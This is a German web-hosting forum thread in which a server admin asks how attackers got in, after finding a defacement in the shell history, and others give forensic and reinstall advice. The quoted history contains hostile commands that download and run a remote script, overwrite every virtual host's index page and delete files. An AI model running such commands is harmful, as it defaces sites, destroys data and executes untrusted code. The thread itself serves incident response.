Server ist gehackt worden

Rund um die Sicherheit des Systems und die Applikationen
fred feuerstein
Posts: 8
Joined: 2002-07-19 18:13
Location: Esslingen / Neckar

Server ist gehackt worden

Post by fred feuerstein » 2004-01-03 01:55

Hallo Leute,

hat mir jemand einen Tipp wie ich ermitteln kann wie sie auf den Server gekommen sind ?? :evil:
Meine logs sind gelöscht . Das rootpassword ist geändert .
Ich habe folgendes in .bash_history gefunden.

id
rm -rf *
ls
locate httpd.conf
cd /var/www/virtual/
ls
cd /tmp
ls
wget http://www.securebi0s.hpg.com.br/index.txt
mv index.txt index.html
find /var/www/virtual/*/htdocs/ -name "index.*" -exec cp /tmp/index.html {} ;
ls
w
wget http://www.securebi0s.hpg.com.br/bi0sinfo.sh
chmod +x bi0sinfo.sh
./bi0sinfo.sh
rm -rf *
ls
pwd

dodolin
Posts: 3840
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Server ist gehackt worden

Post by dodolin » 2004-01-03 02:05

hat mir jemand einen Tipp wie ich ermitteln kann wie sie auf den Server gekommen sind ?
Deine bash_history zeigt lediglich, wie sie in allen vhosts von Apache die Startseite ersetzt haben, vermutlich so ein Demasking-Wettbewerb, oder wie das heißt... ;)

Es gibt aktuell ne Security-Edition vom Linux-Magazin. Dort ist u.a. ein Artikel überSleuthkit drin. Wenn du keine Logs hast, kein Tripwire oder anderes IDS im Einsatz hast, könnte das deine letzte Chance sein. Ansonsten wirst du wohl im Dunkeln bleiben müssen...

PS: Ich hoffe doch sehr, der Server ist inzwischen im Rescue-Modus?!

fred feuerstein
Posts: 8
Joined: 2002-07-19 18:13
Location: Esslingen / Neckar

Re: Server ist gehackt worden

Post by fred feuerstein » 2004-01-03 03:34

Ja, ich habe den Server gleich in den Rescue-Modus versetzt.

Ich habe aber das Problem das ich erst in ca. 1 Woche einen
Ausweichserver habe.

Ich bin also schwer am überlegen Ihn wieder normal zu starten.

rootpasswort habe ich zurückgesetzt. PHP-Nuke gelöscht.

Ich geh jetzt erst mal schlafen. Vielleicht finde ich ja morgen noch

Spuren.

Das Linux-Magazin werde ich mir auch besorgen.

dodolin
Posts: 3840
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Server ist gehackt worden

Post by dodolin » 2004-01-03 11:05

PHP-Nuke gelöscht
Wenn das drauf war, ist das schonmal ein ziemlich wahrscheinliches Einfallstor...

jtb
Posts: 599
Joined: 2002-08-18 16:41
Location: Darmstadt

Re: Server ist gehackt worden

Post by jtb » 2004-01-03 12:19

na ja, das Script ist relativ simpel..
Es scheint jedenfalls keine Backdoor eingebaut worden sein..
Trotzdem solltest du einen Check darauf machen!

dodolin
Posts: 3840
Joined: 2003-01-21 01:59
Location: Sinsheim/Karlsruhe

Re: Server ist gehackt worden

Post by dodolin » 2004-01-03 14:04

Es scheint jedenfalls keine Backdoor eingebaut worden sein..
Woher weißt du das?

darkspirit
Posts: 553
Joined: 2002-10-05 16:39
Location: D'dorf

Re: Server ist gehackt worden

Post by darkspirit » 2004-01-03 14:15

Wie immer in so einem Fall: Statische Daten sichern, Scripte evtl. auch, aber manuell überprüfen, danach Neuinitialisierung.
Man kann sich in keiner Weise darauf verlassen, dass der Angreifer tatsächlich nur das gemacht hat, was in der Bash-History auftaucht.

User avatar
Joe User
Project Manager
Project Manager
Posts: 11139
Joined: 2003-02-27 01:00
Location: Hamburg

Re: Server ist gehackt worden

Post by Joe User » 2004-01-03 14:56

DarkSpirit wrote:Man kann sich in keiner Weise darauf verlassen, dass der Angreifer tatsächlich nur das gemacht hat, was in der Bash-History auftaucht.
ACK, zumal das (fehlerhafte) Script erst nach der "Arbeit" ausgeführt wurde...
PayPal.Me/JoeUserFreeBSD Remote Installation
Wings for LifeWings for Life World Run

„If there’s more than one possible outcome of a job or task, and one
of those outcomes will result in disaster or an undesirable consequence,
then somebody will do it that way.“ -- Edward Aloysius Murphy Jr.

jtb
Posts: 599
Joined: 2002-08-18 16:41
Location: Darmstadt

Re: Server ist gehackt worden

Post by jtb » 2004-01-03 16:06

dodolin wrote:
Es scheint jedenfalls keine Backdoor eingebaut worden sein..
Woher weißt du das?
ok, es scheint wirklich nur auf dem ersten Blick so..